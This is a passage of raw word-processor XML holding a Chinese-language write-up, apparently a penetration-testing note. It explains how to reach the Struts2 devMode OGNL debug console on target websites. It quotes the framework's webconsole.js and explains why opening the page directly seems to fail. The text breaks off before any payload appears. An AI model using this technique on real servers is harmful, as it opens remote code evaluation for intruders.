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29C" w:rsidRDefault="003A27D3" w:rsidP="001C7FC2">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2557">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>背景</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2557">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00110904" w:rsidRPr="009D47AB" w:rsidRDefault="002B7062" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D47AB">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>很多</w:t>
      </w:r>
      <w:r w:rsidR="009C3D6E">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>好伙伴</w:t>
      </w:r>
      <w:r w:rsidRPr="009D47AB">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>说这个页面搞不了，自己也没有利用成功过，页面没有</w:t>
      </w:r>
      <w:r w:rsidR="00B9129C" w:rsidRPr="009D47AB">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>激活！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0020547F" w:rsidRDefault="0020547F" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00395203" w:rsidRPr="009D47AB" w:rsidRDefault="00395203" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D47AB">
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r w:rsidR="00DE6FD3" w:rsidRPr="009D47AB">
        <w:rPr>
          <w:rStyle w:val="s3"/>
        </w:rPr>
        <w:t>支持的几种调试方式:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395203" w:rsidRPr="00552F73" w:rsidRDefault="00395203" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Dumps the parameters, context, session, and value stack as an XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395203" w:rsidRPr="00552F73" w:rsidRDefault="00395203" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Shows a popup 'OGNL Console' that allows the user to test OGNL expressions against the value stack. The XML data from the 'xml' mode is inserted at the top of the page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395203" w:rsidRPr="00552F73" w:rsidRDefault="00395203" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Tests an OGNL expression and returns the string result. Only used by the OGNL console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51A31" w:rsidRPr="00552F73" w:rsidRDefault="00395203" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shows field values of an object specified in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter (#context by default). When the </w:t>
      </w:r>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00552F73">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameters is set, the '#' character needs to be escaped to '%23'. Like debug=browser&amp;object=%23parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51A31" w:rsidRPr="00A51A31" w:rsidRDefault="00A51A31" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF609F" w:rsidRPr="009D47AB" w:rsidRDefault="00395203" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>比较关注的是</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">console </w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>这种形式，提供了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ognl</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>表达式的</w:t>
      </w:r>
      <w:r w:rsidR="00A51A31" w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r w:rsidR="00A51A31" w:rsidRPr="009D47AB">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51A31" w:rsidRPr="00E52FA4" w:rsidRDefault="00A51A31" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760B2B" w:rsidRPr="004F303B" w:rsidRDefault="00A51A31" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/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</w:pPr>
      <w:r w:rsidRPr="00E52FA4">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="007B3011" w:rsidRPr="00E52FA4">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>onsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
      <w:r w:rsidR="00F86DC7" w:rsidRPr="00E52FA4">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>核心代码在</w:t>
      </w:r>
      <w:r w:rsidR="00B70712" w:rsidRPr="00E52FA4">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Webconsole</w:t>
      </w:r>
      <w:r w:rsidR="00B70712" w:rsidRPr="00E52FA4">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.js</w:t>
      </w:r>
      <w:r w:rsidR="00BF75CB" w:rsidRPr="00E52FA4">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00B70712" w:rsidRPr="00E52FA4">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/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t>function keyEvent(event, url) {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switch (event.keyCode) {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case 13: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  var the_shell_command = document.getElementById('wc-command').value;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  if (the_shell_command) {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    commands_history[commands_history.length] = the_shell_command;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    history_pointer = commands_history.length;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    var the_url = url ? url : window.opener.location.pathname;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    jQuery.post(the_url, jQuery("#wc-form").serialize(), function (data) {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      printResult(data);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    });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  }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  break;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case 38: // this is the arrow up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  if (history_pointer &gt; 0) {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    history_pointer--;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lastRenderedPageBreak/>
        <w:t>        document.getElementById('wc-command').value = commands_history[history_pointer];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  }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  break;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case 40: // this is the arrow down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  if (history_pointer &lt; commands_history.length - 1) {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    history_pointer++;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    document.getElementById('wc-command').value = commands_history[history_pointer];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  }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  break;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default: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    break;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  }</w:t>
      </w:r>
      <w:r w:rsidR="00B70712" w:rsidRPr="004F303B">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F30DD" w:rsidRPr="00E52FA4" w:rsidRDefault="004F303B" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetic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4D71156" wp14:editId="49C0CBF6">
            <wp:extent cx="5580380" cy="21253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47" w:rsidRPr="00A2191C" w:rsidRDefault="00EF5F47" w:rsidP="00EF5F47">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>var the_url = url ? url : window.opener.location.pathname;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF5F47" w:rsidRPr="00A2191C" w:rsidRDefault="00EF5F47" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3C5C" w:rsidRPr="00283893" w:rsidRDefault="00760B2B" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>注意这代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>the_url赋值是从</w:t>
      </w:r>
      <w:r w:rsidR="00796DA7" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>父窗体拿到的</w:t>
      </w:r>
      <w:r w:rsidR="00825829" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:r w:rsidR="009E07A3" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，所以通过浏览器直接访问</w:t>
      </w:r>
      <w:r w:rsidR="00AB5644" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>struts/webconsole.html页面拿不到这个值</w:t>
      </w:r>
      <w:r w:rsidR="00AB5644" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A1342A" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>浏览器会</w:t>
      </w:r>
      <w:r w:rsidR="00AB5644" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>报异常</w:t>
      </w:r>
      <w:r w:rsidR="00F74B4D" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00FA64AB" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>所以我们</w:t>
      </w:r>
      <w:r w:rsidR="000D72C4" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>误以为</w:t>
      </w:r>
      <w:r w:rsidR="00F74B4D" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>这个页面没有激活</w:t>
      </w:r>
      <w:r w:rsidR="0056770E" w:rsidRPr="00A2191C">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E82DF5" w:rsidRPr="00502E9E" w:rsidRDefault="00E82DF5" w:rsidP="00502E9E">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00502E9E">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidR="001C7FC2" w:rsidRPr="00502E9E">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E9E">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E82DF5" w:rsidRPr="00E532E4" w:rsidRDefault="00E82DF5" w:rsidP="00A22039">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="384" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
          <w:rStyle w:val="s3"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>如果目标网站</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1218">
        <w:rPr>
